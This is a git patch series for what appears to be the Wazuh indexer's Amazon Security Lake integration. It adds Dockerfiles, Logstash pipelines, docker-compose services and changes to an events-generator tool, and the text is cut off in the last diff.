+*.py[cod] +*$py.class + +# C extensions +*.so + +# Distribution / packaging +.Python +build/ +develop-eggs/ +dist/ +downloads/ +eggs/ +.eggs/ +lib/ +lib64/ +parts/ +sdist/ +var/ +wheels/ +share/python-wheels/ +*.egg-info/ +.installed.cfg +*.egg +MANIFEST + +# PyInstaller +# Usually these files are written by a python script from a template +# before PyInstaller builds the exe, so as to inject date/other infos into it. +*.manifest +*.spec + +# Installer logs +pip-log.txt +pip-delete-this-directory.txt + +# Unit test / coverage reports +htmlcov/ +.tox/ +.nox/ +.coverage +.coverage.* +.cache +nosetests.xml +coverage.xml +*.cover +*.py,cover +.hypothesis/ +.pytest_cache/ +cover/ + +# Translations +*.mo +*.pot + +# Django stuff: +*.log +local_settings.py +db.sqlite3 +db.sqlite3-journal + +# Flask stuff: +instance/ +.webassets-cache + +# Scrapy stuff: +.scrapy + +# Sphinx documentation +docs/_build/ + +# PyBuilder +.pybuilder/ +target/ + +# Jupyter Notebook +.ipynb_checkpoints + +# IPython +profile_default/ +ipython_config.py + +# pyenv +# For a library or package, you might want to ignore these files since the code is +# intended to run in multiple environments; otherwise, check them in: +# .python-version + +# pipenv +# According to pypa/pipenv#598, it is recommended to include Pipfile.lock in version control. +# However, in case of collaboration, if having platform-specific dependencies or dependencies +# having no cross-platform support, pipenv may install dependencies that don't work, or not +# install all needed dependencies. +#Pipfile.lock + +# poetry +# Similar to Pipfile.lock, it is generally recommended to include poetry.lock in version control. +# This is especially recommended for binary packages to ensure reproducibility, and is more +# commonly ignored for libraries. +# https://python-poetry.org/docs/basic-usage/#commit-your-poetrylock-file-to-version-control +#poetry.lock + +# pdm +# Similar to Pipfile.lock, it is generally recommended to include pdm.lock in version control. +#pdm.lock +# pdm stores project-wide configurations in .pdm.toml, but it is recommended to not include it +# in version control. +# https://pdm.fming.dev/#use-with-ide +.pdm.toml + +# PEP 582; used by e.g. github.com/David-OConnor/pyflow and github.com/pdm-project/pdm +__pypackages__/ + +# Celery stuff +celerybeat-schedule +celerybeat.pid + +# SageMath parsed files +*.sage.py + +# Environments +.env +.venv +env/ +venv/ +ENV/ +env.bak/ +venv.bak/ + +# Spyder project settings +.spyderproject +.spyproject + +# Rope project settings +.ropeproject + +# mkdocs documentation +/site + +# mypy +.mypy_cache/ +.dmypy.json +dmypy.json + +# Pyre type checker +.pyre/ + +# pytype static type analyzer +.pytype/ + +# Cython debug symbols +cython_debug/ + +# PyCharm +# JetBrains specific template is maintained in a separate JetBrains.gitignore that can +# be found at https://github.com/github/gitignore/blob/main/Global/JetBrains.gitignore +# and can be added to the global gitignore or merged into this file. For a more nuclear +# option (not recommended) you can uncomment the following to ignore the entire idea folder. +#.idea/ + +### Python Patch ### +# Poetry local configuration file - https://python-poetry.org/docs/configuration/#local-configuration +poetry.toml + +# ruff +.ruff_cache/ + +# LSP config files +pyrightconfig.json + +# End of https://www.toptal.com/developers/gitignore/api/python \ No newline at end of file diff --git a/integrations/amazon-security-lake/Dockerfile b/integrations/amazon-security-lake/Dockerfile new file mode 100644 index 0000000000000..a2eec0f8d6075 --- /dev/null +++ b/integrations/amazon-security-lake/Dockerfile @@ -0,0 +1,41 @@ +# MULTI-STAGE build + +FROM python:3.9 as builder +# Create a virtualenv for dependencies. This isolates these packages from +# system-level packages. +RUN python3 -m venv /env +# Setting these environment variables are the same as running +# source /env/bin/activate. +ENV VIRTUAL_ENV /env +ENV PATH /env/bin:$PATH +# Copy the application's requirements.txt and run pip to install all +# dependencies into the virtualenv. +COPY requirements.txt /app/requirements.txt +RUN pip install -r /app/requirements.txt + + +FROM python:3.9 +ENV LOGSTASH_KEYSTORE_PASS="SecretPassword" +# Add the application source code. +COPY --chown=logstash:logstash . /home/app +# Add execution persmissions. +RUN chmod a+x /home/app/run.py +# Copy the application's dependencies. +COPY --from=builder /env /env + +# Install Logstash +RUN apt-get update && apt-get install -y iputils-ping wget gpg apt-transport-https +RUN wget -qO - https://artifacts.elastic.co/GPG-KEY-elasticsearch | gpg --dearmor -o /usr/share/keyrings/elastic-keyring.gpg && \ + echo "deb [signed-by=/usr/share/keyrings/elastic-keyring.gpg] https://artifacts.elastic.co/packages/8.x/apt stable main" | tee -a /etc/apt/sources.list.d/elastic-8.x.list && \ + apt-get update && apt install -y logstash +# Install logstash-input-opensearch plugin. +RUN /usr/share/logstash/bin/logstash-plugin install logstash-input-opensearch +# Copy the Logstash's ingestion pipelines. +COPY --chown=logstash:logstash logstash/pipeline /usr/share/logstash/pipeline +# Grant logstash ownership over its files +RUN chown --recursive logstash:logstash /usr/share/logstash /etc/logstash /var/log/logstash /var/lib/logstash + +USER logstash +# Copy and run the setup.sh script to create and configure a keystore for Logstash. +COPY --chown=logstash:logstash logstash/setup.sh /usr/share/logstash/bin/setup.sh +RUN bash /usr/share/logstash/bin/setup.sh \ No newline at end of file diff --git a/integrations/amazon-security-lake/README.md b/integrations/amazon-security-lake/README.md index 46eee1b92a4b0..1dbe1dd4ebb23 100644 --- a/integrations/amazon-security-lake/README.md +++ b/integrations/amazon-security-lake/README.md @@ -46,4 +46,17 @@ sudo -E /usr/share/logstash/bin/logstash -f /etc/logstash/conf.d/wazuh-s3.conf - # Start Logstash sudo systemctl enable logstash sudo systemctl start logstash -``` \ No newline at end of file +``` + + +### Building the Docker image + +```console +docker build -t wazuh/indexer-security-lake-integration:latest . --progress=plain +``` + + +Run with: +```console +docker run -it --name=wazuh-indexer-security-lake-integration --rm wazuh/indexer-security-lake-integration ls +``` diff --git a/integrations/amazon-security-lake/logstash/pipeline/indexer-to-file.conf b/integrations/amazon-security-lake/logstash/pipeline/indexer-to-file.conf new file mode 100644 index 0000000000000..e3fa60a785372 --- /dev/null +++ b/integrations/amazon-security-lake/logstash/pipeline/indexer-to-file.conf @@ -0,0 +1,26 @@ +input { + opensearch { + hosts => ["opensearch-node:9200"] + user => "${INDEXER_USERNAME}" + password => "${INDEXER_PASSWORD}" + ssl => false + index => "wazuh-alerts-4.x-*" + query => '{ + "query": { + "range": { + "@timestamp": { + "gt": "now-1m" + } + } + } + }' + target => "_source" + schedule => "* * * * *" + } +} + +output { + file { + path => "/usr/share/logstash/pipeline/indexer-to-file.json" + } +} diff --git a/integrations/amazon-security-lake/logstash/pipeline/pipe-output.conf b/integrations/amazon-security-lake/logstash/pipeline/indexer-to-integrator.conf similarity index 100% rename from integrations/amazon-security-lake/logstash/pipeline/pipe-output.conf rename to integrations/amazon-security-lake/logstash/pipeline/indexer-to-integrator.conf diff --git a/integrations/amazon-security-lake/logstash/pipeline/wazuh-s3.conf b/integrations/amazon-security-lake/logstash/pipeline/indexer-to-s3.conf similarity index 100% rename from integrations/amazon-security-lake/logstash/pipeline/wazuh-s3.conf rename to integrations/amazon-security-lake/logstash/pipeline/indexer-to-s3.conf diff --git a/integrations/amazon-security-lake/logstash/setup.sh b/integrations/amazon-security-lake/logstash/setup.sh index 2b1fc109f401a..9527f1fa58362 100644 --- a/integrations/amazon-security-lake/logstash/setup.sh +++ b/integrations/amazon-security-lake/logstash/setup.sh @@ -4,12 +4,7 @@ # indexer's credentials. NOTE: works only for dockerized logstash. # Source: https://www.elastic.co/guide/en/logstash/current/keystore.html -# Prepare keystore -set +o history -export LOGSTASH_KEYSTORE_PASS="SecretPassword" -set -o history - # Create keystore -/usr/share/logstash/bin/logstash-keystore create -echo "admin" | /usr/share/logstash/bin/logstash-keystore add INDEXER_USERNAME -echo "admin" | /usr/share/logstash/bin/logstash-keystore add INDEXER_PASSWORD +/usr/share/logstash/bin/logstash-keystore create --path.settings /etc/logstash +echo "admin" | /usr/share/logstash/bin/logstash-keystore add INDEXER_USERNAME --path.settings /etc/logstash +echo "admin" | /usr/share/logstash/bin/logstash-keystore add INDEXER_PASSWORD --path.settings /etc/logstash diff --git a/integrations/amazon-security-lake/run.py b/integrations/amazon-security-lake/run.py index d8234226bf98e..515d1d97610f9 100644 --- a/integrations/amazon-security-lake/run.py +++ b/integrations/amazon-security-lake/run.py @@ -1,3 +1,5 @@ +#!/env/bin/python3.9 + import transform import json diff --git a/integrations/amazon-security-lake/stdin_to_securitylake.py b/integrations/amazon-security-lake/stdin_to_securitylake.py index ab399f58b7b9a..4aa650b158c54 100755 --- a/integrations/amazon-security-lake/stdin_to_securitylake.py +++ b/integrations/amazon-security-lake/stdin_to_securitylake.py @@ -1,4 +1,4 @@ -#!/home/fede/src/wazuh-indexer/integrations/amazon-security-lake/venv/bin/python3 +#!/env/bin/python3.9 import os import sys diff --git a/integrations/amazon-security-lake/docker-compose.yml b/integrations/docker/amazon-security-lake.yml similarity index 69% rename from integrations/amazon-security-lake/docker-compose.yml rename to integrations/docker/amazon-security-lake.yml index 6c5c1c21445c9..67effe4deed55 100644 --- a/integrations/amazon-security-lake/docker-compose.yml +++ b/integrations/docker/amazon-security-lake.yml @@ -1,5 +1,18 @@ version: '3' +name: "amazon-security-lake" services: + events-generator: + image: wazuh/indexer-events-generator + build: + context: ../tools/events-generator + container_name: events-generator + depends_on: + - opensearch-node + networks: + - opensearch-net + # TODO add healthcheck to indexer's service to avoid sending requests before API is ready. + command: bash -c "sleep 10 && echo 'Ey, wake up!' && python run.py -a opensearch-node" + opensearch-node: image: opensearchproject/opensearch:latest # This should be the same image used for opensearch-node1 to avoid issues container_name: opensearch-node @@ -21,6 +34,7 @@ services: - opensearch-data:/usr/share/opensearch/data networks: - opensearch-net + opensearch-dashboards: image: opensearchproject/opensearch-dashboards:latest # Make sure the version of opensearch-dashboards matches the version of opensearch installed on other nodes container_name: opensearch-dashboards @@ -33,16 +47,9 @@ services: networks: - opensearch-net logstash: + image: wazuh/indexer-security-lake-integration build: - context: . - dockerfile_inline: | - FROM logstash:8.12.1 - - COPY --chown=logstash:logstash logstash/setup.sh /usr/share/logstash/bin/setup.sh - COPY --chown=logstash:logstash logstash/pipeline/pipe-output.conf /usr/share/logstash/pipeline/pipe-output.config - - RUN bash /usr/share/logstash/bin/setup.sh - RUN /usr/share/logstash/bin/logstash-plugin install logstash-input-opensearch + context: ../amazon-security-lake container_name: logstash environment: LOG_LEVEL: trace @@ -53,12 +60,14 @@ services: - "5000:5000/udp" - "5044:5044" - "9600:9600" + volumes: + - ../amazon-security-lake/logstash/pipeline:/usr/share/logstash/pipeline depends_on: - opensearch-node networks: - opensearch-net command: tail -f /dev/null - # command: logstash -f /usr/share/logstash/pipeline/pipe-output.config + # command: /usr/share/logstash/bin/logstash -f /usr/share/logstash/pipeline/indexer-to-integrator.config --path.settings /etc/logstash volumes: opensearch-data: diff --git a/integrations/tools/events-generator/.dockerignore b/integrations/tools/events-generator/.dockerignore new file mode 100644 index 0000000000000..0f028b576338e --- /dev/null +++ b/integrations/tools/events-generator/.dockerignore @@ -0,0 +1,2 @@ +.venv +Dockerfile \ No newline at end of file diff --git a/integrations/tools/events-generator/Dockerfile b/integrations/tools/events-generator/Dockerfile new file mode 100644 index 0000000000000..da32f8c042017 --- /dev/null +++ b/integrations/tools/events-generator/Dockerfile @@ -0,0 +1,4 @@ +FROM python:3.9 +COPY . /home/events-generator/ +WORKDIR /home/events-generator +RUN pip install -r requirements.txt \ No newline at end of file diff --git a/integrations/tools/events-generator/README.md b/integrations/tools/events-generator/README.md index b11988192929e..ed8e53ea8acd9 100644 --- a/integrations/tools/events-generator/README.md +++ b/integrations/tools/events-generator/README.md @@ -41,3 +41,14 @@ INFO:event_generator:Event created INFO:event_generator:Event created {'_index': 'wazuh-alerts-4.x-2024.02.13-000001', '_id': 'eRWno40BZRXLJU5t4u66', '_version': 1, 'result': 'created', '_shards': {'total': 2, 'successful': 2, 'failed': 0}, '_seq_no': 172, '_primary_term': 1} ``` + +### Building the Docker image + +```console +docker build -t wazuh/indexer-events-generator:latest . +``` + +Run with: +```console +docker run -it --name=wazuh-indexer-events-generator --rm wazuh/indexer-events-generator python run.py -h +``` \ No newline at end of file diff --git a/integrations/tools/events-generator/run.py b/integrations/tools/events-generator/run.py index 3a6a4aeba9fc0..9b56f6969c505 100644 --- a/integrations/tools/events-generator/run.py +++ b/integrations/tools/events-generator/run.py @@ -1,4 +1,4 @@ -#!/usr/bin/pyton +#!/usr/bin/python3 # Events generator tool for Wazuh's indices. # Chooses a random element from /alerts.json to index @@ -136,6 +136,11 @@ def parse_args(): parser = argparse.ArgumentParser( description="Events generator tool for Wazuh's indices. Indexes a random element from /alerts.json", ) + parser.add_argument( + '-i', '--index', + default="wazuh-alerts-4.x-sample", + help="Destination index name or alias" + ) parser.add_argument( '-o', '--output', choices=['indexer', 'filebeat'], @@ -143,9 +148,9 @@ def parse_args(): help="Destination of the events. Default: indexer." ) parser.add_argument( - '-i', '--index', + '-m', '--module', default="wazuh-alerts", - help="Index name or module (e.g: wazuh-alerts, wazuh-states-vulnerabilities)" + help="Wazuh module to read the alerts from (e.g: wazuh-alerts, wazuh-states-vulnerabilities). Must match a subfolder's name." ) # Infinite loop by default parser.add_argument( @@ -189,7 +194,7 @@ def parse_args(): def main(args: dict): - inventory = Inventory(f"{args['index']}/alerts.json") + inventory = Inventory(f"{args['module']}/alerts.json") logger.info("Inventory created") publisher = PublisherCreator.create(args["output"], args) logger.info("Publisher created") From 17f47caec1e9db250585e01878ae4a0a62657f43 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=C3=81lex=20Ruiz?= Date: Thu, 22 Feb 2024 15:58:02 +0100 Subject: [PATCH 49/77] Fix events-generator's Inventory starvation --- integrations/tools/events-generator/run.py | 6 ++++-- 1 file changed, 4 insertions(+), 2 deletions(-) diff --git a/integrations/tools/events-generator/run.py b/integrations/tools/events-generator/run.py index 9b56f6969c505..ec4ded0010c76 100644 --- a/integrations/tools/events-generator/run.py +++ b/integrations/tools/events-generator/run.py @@ -42,9 +42,11 @@ def __init__(self, path: str): self.size = len(self.elements) def get_random(self) -> str: + """ + Returns the last element of the list + """ random.shuffle(self.elements) - return self.elements.pop() - # return self.elements[random.randint(0, self.size)] + return self.elements[self.size-1] # ================================================== # From 204948fdad9f77095e625a8278e06c212b26f2f0 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=C3=81lex=20Ruiz?= Date: Thu, 22 Feb 2024 16:08:30 +0100 Subject: [PATCH 50/77] Remove files present in #147 --- .../stdin_to_securitylake.py | 91 -------------- .../transform/legacy/legacy_converter.py | 87 ------------- .../transform/legacy/legacy_test.py | 15 --- integrations/docker/docker-compose.yml | 117 ------------------ 4 files changed, 310 deletions(-) delete mode 100755 integrations/amazon-security-lake/stdin_to_securitylake.py delete mode 100644 integrations/amazon-security-lake/transform/legacy/legacy_converter.py delete mode 100644 integrations/amazon-security-lake/transform/legacy/legacy_test.py delete mode 100644 integrations/docker/docker-compose.yml diff --git a/integrations/amazon-security-lake/stdin_to_securitylake.py b/integrations/amazon-security-lake/stdin_to_securitylake.py deleted file mode 100755 index 4aa650b158c54..0000000000000 --- a/integrations/amazon-security-lake/stdin_to_securitylake.py +++ /dev/null @@ -1,91 +0,0 @@ -#!/env/bin/python3.9 - -import os -import sys -import argparse -import logging -import time -import json -import datetime -from pyarrow import parquet, Table, fs - -from transform import converter - -block_ending = { "block_ending": True } - -def encode_parquet(list,foldername,filename): - try: - table = Table.from_pylist(list) - parquet.write_table(table, '{}/{}.parquet'.format(foldername,filename)) - except Exception as e: - logging.error(e) - raise - -def map_block(fileobject, length): - output=[] - ocsf_mapped_alert = {} - for line in range(0, length): - line = fileobject.readline() - if line == '': - output.append(block_ending) - break - alert = json.loads(line) - ocsf_mapped_alert = converter.convert(alert) - output.append(ocsf_mapped_alert) - return output - -def get_elapsedseconds(reference_timestamp): - current_time = datetime.datetime.now(datetime.timezone.utc) - return (current_time - reference_timestamp).total_seconds() - -if __name__ == "__main__": - date = datetime.datetime.now(datetime.timezone.utc).strftime('%F_%H.%M.%S') - parser = argparse.ArgumentParser(description='STDIN to Security Lake pipeline') - parser.add_argument('-d','--debug', action='store_true', help='Activate debugging') - parser.add_argument('-i','--pushinterval', type=int, action='store', default=299, help='Time interval in seconds for pushing data to Security Lake') - parser.add_argument('-l','--logoutput', type=str, default="/tmp/stdintosecuritylake.txt", help='File path of the destination file to write to') - parser.add_argument('-m','--maxlength', type=int, action='store', default=2000, help='Event number threshold for submission to Security Lake') - parser.add_argument('-n','--linebuffer', type=int, action='store', default=100, help='stdin line buffer length') - parser.add_argument('-o','--outputfolder', type=str, action='store', help='Folder or S3 bucket URL to dump parquet files to') - parser.add_argument('-s','--sleeptime', type=int, action='store', default=5, help='Input buffer polling interval') - args = parser.parse_args() - #logging.basicConfig(format='%(asctime)s %(message)s', filename=args.logoutput, encoding='utf-8', level=logging.DEBUG) - logging.basicConfig(format='%(asctime)s %(message)s', encoding='utf-8', level=logging.DEBUG) - logging.info('BUFFERING STDIN') - - try: - - with os.fdopen(sys.stdin.fileno(), 'rt') as stdin: - output_buffer = [] - starttimestamp = datetime.datetime.now(datetime.timezone.utc) - - try: - while True: - - current_block = map_block( stdin, args.linebuffer ) - - if current_block[-1] == block_ending: - output_buffer += current_block[0:-1] - time.sleep(args.sleeptime) - else: - output_buffer += current_block - - if len(output_buffer) == 0: - continue - - if len(output_buffer) > args.maxlength or get_elapsedseconds(starttimestamp) > args.pushinterval: - logging.info('Writing data to parquet file') - encode_parquet(output_buffer,args.outputfolder,'wazuh-{}'.format(date)) - starttimestamp = datetime.datetime.now(datetime.timezone.utc) - output_buffer = [] - - except KeyboardInterrupt: - logging.info("Keyboard Interrupt issued") - exit(0) - - logging.info('FINISHED RETRIEVING STDIN') - - except Exception as e: - logging.error("Error running script") - logging.error(e) - raise diff --git a/integrations/amazon-security-lake/transform/legacy/legacy_converter.py b/integrations/amazon-security-lake/transform/legacy/legacy_converter.py deleted file mode 100644 index 2a14b75957c97..0000000000000 --- a/integrations/amazon-security-lake/transform/legacy/legacy_converter.py +++ /dev/null @@ -1,87 +0,0 @@ -#!/usr/bin/python - -# event comes from Filebeat -event = {} - - -def normalize(level: int) -> int: - """ - Normalizes rule level into the 0-6 range, required by OCSF. - """ - # TODO normalization - return level - - -def join(iterable, separator=","): - return (separator.join(iterable)) - - -def convert(event: dict) -> dict: - """ - Converts Wazuh events to OCSF's Detecting Finding (2004) class. - """ - ocsf_class_template = \ - { - "activity_id": 1, - "category_name": "Findings", - "category_uid": 2, - "class_name": "Detection Finding", - "class_uid": 2004, - "count": event["rule"]["firedtimes"], - "message": event["rule"]["description"], - "finding_info": { - "analytic": { - "category": join(event["rule"]["groups"]), - "name": event["decoder"]["name"], - "type_id": 1, - "uid": event["rule"]["id"], - }, - "attacks": { - "tactic": { - "name": join(event["rule"]["mitre"]["tactic"]), - }, - "technique": { - "name": join(event["rule"]["mitre"]["technique"]), - "uid": join(event["rule"]["mitre"]["id"]), - }, - "version": "v13.1" - }, - "title": event["rule"]["description"], - "types": [ - event["input"]["type"] - ], - "uid": event['id'] - }, - "metadata": { - "log_name": "Security events", - "log_provider": "Wazuh", - "product": { - "name": "Wazuh", - "lang": "en", - "vendor_name": "Wazuh, Inc,." - }, - "version": "1.1.0", - }, - "raw_data": event["full_log"], - "resources": [ - { - "name": event["agent"]["name"], - "uid": event["agent"]["id"] - }, - ], - "risk_score": event["rule"]["level"], - "severity_id": normalize(event["rule"]["level"]), - "status_id": 99, - "time": event["timestamp"], - "type_uid": 200401, - "unmapped": { - "data_sources": [ - event["_index"], - event["location"], - event["manager"]["name"] - ], - "nist": event["rule"]["nist_800_53"], # Array - } - } - - return ocsf_class_template diff --git a/integrations/amazon-security-lake/transform/legacy/legacy_test.py b/integrations/amazon-security-lake/transform/legacy/legacy_test.py deleted file mode 100644 index ebcb8fa4b2e90..0000000000000 --- a/integrations/amazon-security-lake/transform/legacy/legacy_test.py +++ /dev/null @@ -1,15 +0,0 @@ -#!/usr/bin/python - -from transform.legacy.converter import convert -import json - -converted_event = {} -with open("../wazuh-event.sample.json", "r") as fd: - sample_event = json.load(fd) - # print(json.dumps(sample_event, indent=4)) - converted_event = convert(sample_event) - -if converted_event: - with open("../wazuh-event.ocsf.json", "w") as fd: - json.dump(converted_event, fd) - print("Done") diff --git a/integrations/docker/docker-compose.yml b/integrations/docker/docker-compose.yml deleted file mode 100644 index dd7f12f119e05..0000000000000 --- a/integrations/docker/docker-compose.yml +++ /dev/null @@ -1,117 +0,0 @@ -version: "3.8" - -services: - - events-generator: - image: events-generator - build: - dockerfile_inline: | - FROM ubuntu:20.04 - RUN apt update && apt install -y python3-requests - container_name: events-generator - volumes: - - ../tools/events-generator:/home/events-generator - hostname: events-generator - working_dir: "/home/events-generator" - entrypoint: sh -c "python3 run.py" - networks: - wazuh-indexer-dev: - aliases: - - events-generator - ipv4_address: 172.18.0.2 - depends_on: - - wazuh-indexer - - wazuh-indexer: - image: wazuh/wazuh-indexer:4.8.0-beta1 - container_name: wazuh-indexer - hostname: wazuh-indexer - restart: always - networks: - wazuh-indexer-dev: - aliases: - - wazuh-indexer - ipv4_address: 172.18.0.3 - ports: - - "9222:9200" - depends_on: - - generator - environment: - - "OPENSEARCH_JAVA_OPTS=-Xms1g -Xmx1g" - - "bootstrap.memory_lock=true" - - 'INDEXER_PASSWORD=SecretPassword' - ulimits: - memlock: - soft: -1 - hard: -1 - nofile: - soft: 65536 - hard: 65536 - volumes: - - ./wazuh-indexer-data:/var/lib/wazuh-indexer - - ./config/wazuh_indexer_ssl_certs/root-ca.pem:/usr/share/wazuh-indexer/certs/root-ca.pem - - ./config/wazuh_indexer_ssl_certs/wazuh1.indexer-key.pem:/usr/share/wazuh-indexer/certs/wazuh1.indexer.key - - ./config/wazuh_indexer_ssl_certs/wazuh1.indexer.pem:/usr/share/wazuh-indexer/certs/wazuh1.indexer.pem - - ./config/wazuh_indexer_ssl_certs/admin.pem:/usr/share/wazuh-indexer/certs/admin.pem - - ./config/wazuh_indexer_ssl_certs/admin-key.pem:/usr/share/wazuh-indexer/certs/admin-key.pem - - ./config/wazuh_indexer/wazuh1.indexer.yml:/usr/share/wazuh-indexer/opensearch.yml - - ./config/wazuh_indexer/internal_users.yml:/usr/share/wazuh-indexer/opensearch-security/internal_users.yml - - generator: - image: wazuh/wazuh-certs-generator:0.0.1 - hostname: wazuh-certs-generator - volumes: - - ./config/wazuh_indexer_ssl_certs/:/certificates/ - - ./config/certs.yml:/config/certs.yml - environment: - - HTTP_PROXY=YOUR_PROXY_ADDRESS_OR_DNS - - logstash: - image: logstash - build: - dockerfile_inline: | - FROM ubuntu:20.04 - RUN apt update && apt install -y iputils-ping wget gpg apt-transport-https - WORKDIR /home/logstash - RUN wget -qO - https://artifacts.elastic.co/GPG-KEY-elasticsearch | gpg --dearmor -o /usr/share/keyrings/elastic-keyring.gpg && \ - echo "deb [signed-by=/usr/share/keyrings/elastic-keyring.gpg] https://artifacts.elastic.co/packages/8.x/apt stable main" | tee -a /etc/apt/sources.list.d/elastic-8.x.list && \ - apt update && \ - apt install -y logstash && \ - chown -R logstash:logstash /etc/logstash && \ - chown logstash:logstash /home/logstash - entrypoint: /usr/share/bin/logstash --path.settings /etc/logstash --config.reload.automatic - container_name: logstash - hostname: logstash - user: logstash - volumes: - - ../amazon-security-lake:/home/logstash - - ../amazon-security-lake/logstash/pipe-output.conf:/etc/logstash/conf.d/pipe-output.conf - - ../amazon-security-lake/logstash/pipelines.yml:/etc/logstash/pipelines.yml - networks: - wazuh-indexer-dev: - aliases: - - logstash - ipv4_address: 172.18.0.4 - depends_on: - - wazuh-indexer - - s3-ninja - - s3-ninja: - image: scireum/s3-ninja - container_name: s3-ninja - hostname: s3-ninja - volumes: - - ./s3-ninja_data:/home/sirius/data - networks: - wazuh-indexer-dev: - aliases: - - s3-ninja - ipv4_address: 172.18.0.5 - ports: - - "9444:9000" - -networks: - wazuh-indexer-dev: - ipam: - config: - - subnet: "172.18.0.0/16" From 5fcc9a394a339f373a5a7a557bc302b7efcfc42e Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=C3=81lex=20Ruiz?= Date: Thu, 22 Feb 2024 16:19:33 +0100 Subject: [PATCH 51/77] Cleanup --- integrations/amazon-security-lake/run.py | 10 ---------- 1 file changed, 10 deletions(-) diff --git a/integrations/amazon-security-lake/run.py b/integrations/amazon-security-lake/run.py index 515d1d97610f9..c26adffa2ea0f 100644 --- a/integrations/amazon-security-lake/run.py +++ b/integrations/amazon-security-lake/run.py @@ -17,19 +17,9 @@ def _test(): print("--") print("") print(ocsf_event) - # event = Event.model_validate_json(json.dumps(event)) - # print(event) - # ocsf_event = to_detection_finding(event) except KeyError as e: raise (e) - # except ValidationError as e: - # print(e) - - # if ocsf_event: - # with open("wazuh-event.ocsf.json", "w") as fd: - # json.dump(ocsf_event.model_dump(), fd) - # print(ocsf_event.model_dump()) if __name__ == '__main__': From a2464104dfcddfb28f4376d12a38bd1cc07ac3e1 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=C3=81lex=20Ruiz?= Date: Thu, 22 Feb 2024 18:06:09 +0100 Subject: [PATCH 52/77] Add FQDN hostnames to services for certificates creation --- integrations/docker/amazon-security-lake.yml | 49 +++++++++++--------- 1 file changed, 26 insertions(+), 23 deletions(-) diff --git a/integrations/docker/amazon-security-lake.yml b/integrations/docker/amazon-security-lake.yml index 67effe4deed55..5c2b09d133089 100644 --- a/integrations/docker/amazon-security-lake.yml +++ b/integrations/docker/amazon-security-lake.yml @@ -7,20 +7,21 @@ services: context: ../tools/events-generator container_name: events-generator depends_on: - - opensearch-node + - wazuh.indexer networks: - - opensearch-net + - net # TODO add healthcheck to indexer's service to avoid sending requests before API is ready. - command: bash -c "sleep 10 && echo 'Ey, wake up!' && python run.py -a opensearch-node" + command: bash -c "sleep 10 && echo 'Ey, wake up!' && python run.py -a wazuh.indexer" - opensearch-node: - image: opensearchproject/opensearch:latest # This should be the same image used for opensearch-node1 to avoid issues - container_name: opensearch-node + wazuh.indexer: + image: opensearchproject/opensearch:latest + container_name: wazuh.indexer + hostname: wazuh.indexer environment: - - cluster.name=opensearch-cluster - - node.name=opensearch-node - - discovery.seed_hosts=opensearch-node - - cluster.initial_cluster_manager_nodes=opensearch-node + # - cluster.name=opensearch-cluster + - node.name=wazuh.indexer + - discovery.type=single-node + # - cluster.initial_cluster_manager_nodes=opensearch-node - bootstrap.memory_lock=true - "OPENSEARCH_JAVA_OPTS=-Xms512m -Xmx512m" ulimits: @@ -31,26 +32,28 @@ services: soft: 65536 hard: 65536 volumes: - - opensearch-data:/usr/share/opensearch/data + - data:/usr/share/opensearch/data networks: - - opensearch-net + - net - opensearch-dashboards: + wazuh.dashboard: image: opensearchproject/opensearch-dashboards:latest # Make sure the version of opensearch-dashboards matches the version of opensearch installed on other nodes - container_name: opensearch-dashboards + container_name: wazuh.dashboard + hostname: wazuh.dashboard ports: - 5601:5601 # Map host port 5601 to container port 5601 expose: - "5601" # Expose port 5601 for web access to OpenSearch Dashboards environment: - OPENSEARCH_HOSTS: '["https://opensearch-node:9200"]' # Define the OpenSearch nodes that OpenSearch Dashboards will query + OPENSEARCH_HOSTS: '["https://wazuh.indexer:9200"]' # Define the OpenSearch nodes that OpenSearch Dashboards will query networks: - - opensearch-net - logstash: + - net + wazuh.integration.security.lake: image: wazuh/indexer-security-lake-integration build: context: ../amazon-security-lake - container_name: logstash + container_name: wazuh.integration.security.lake + hostname: wazuh.integration.security.lake environment: LOG_LEVEL: trace LOGSTASH_KEYSTORE_PASS: "SecretPassword" @@ -63,14 +66,14 @@ services: volumes: - ../amazon-security-lake/logstash/pipeline:/usr/share/logstash/pipeline depends_on: - - opensearch-node + - wazuh.indexer networks: - - opensearch-net + - net command: tail -f /dev/null - # command: /usr/share/logstash/bin/logstash -f /usr/share/logstash/pipeline/indexer-to-integrator.config --path.settings /etc/logstash + # command: /usr/share/logstash/bin/logstash -f /usr/share/logstash/pipeline/indexer-to-integrator.conf --path.settings /etc/logstash volumes: - opensearch-data: + data: networks: - opensearch-net: \ No newline at end of file + net: \ No newline at end of file From bf3f1ffdaa2ee9253f59e27ba58c2b3974f95a72 Mon Sep 17 00:00:00 2001 From: Fede Tux Date: Thu, 22 Feb 2024 16:35:33 -0300 Subject: [PATCH 53/77] Add certificate generator service --- integrations/docker/amazon-security-lake.yml | 28 ++++++++- .../docker/wazuh-certs-generator/certs.yml | 16 +++++ .../wazuh-certs-generator/entrypoint.sh | 61 +++++++++++++++++++ 3 files changed, 102 insertions(+), 3 deletions(-) create mode 100644 integrations/docker/wazuh-certs-generator/certs.yml create mode 100644 integrations/docker/wazuh-certs-generator/entrypoint.sh diff --git a/integrations/docker/amazon-security-lake.yml b/integrations/docker/amazon-security-lake.yml index 5c2b09d133089..2ae38b84a4baf 100644 --- a/integrations/docker/amazon-security-lake.yml +++ b/integrations/docker/amazon-security-lake.yml @@ -1,6 +1,7 @@ version: '3' name: "amazon-security-lake" services: + events-generator: image: wazuh/indexer-events-generator build: @@ -14,8 +15,10 @@ services: command: bash -c "sleep 10 && echo 'Ey, wake up!' && python run.py -a wazuh.indexer" wazuh.indexer: - image: opensearchproject/opensearch:latest + image: opensearchproject/opensearch:2.11.1 container_name: wazuh.indexer + depends_on: + - wazuh-certs-generator hostname: wazuh.indexer environment: # - cluster.name=opensearch-cluster @@ -37,8 +40,10 @@ services: - net wazuh.dashboard: - image: opensearchproject/opensearch-dashboards:latest # Make sure the version of opensearch-dashboards matches the version of opensearch installed on other nodes + image: opensearchproject/opensearch-dashboards:2.11.1 container_name: wazuh.dashboard + depends_on: + - wazuh.indexer hostname: wazuh.dashboard ports: - 5601:5601 # Map host port 5601 to container port 5601 @@ -48,11 +53,14 @@ services: OPENSEARCH_HOSTS: '["https://wazuh.indexer:9200"]' # Define the OpenSearch nodes that OpenSearch Dashboards will query networks: - net + wazuh.integration.security.lake: image: 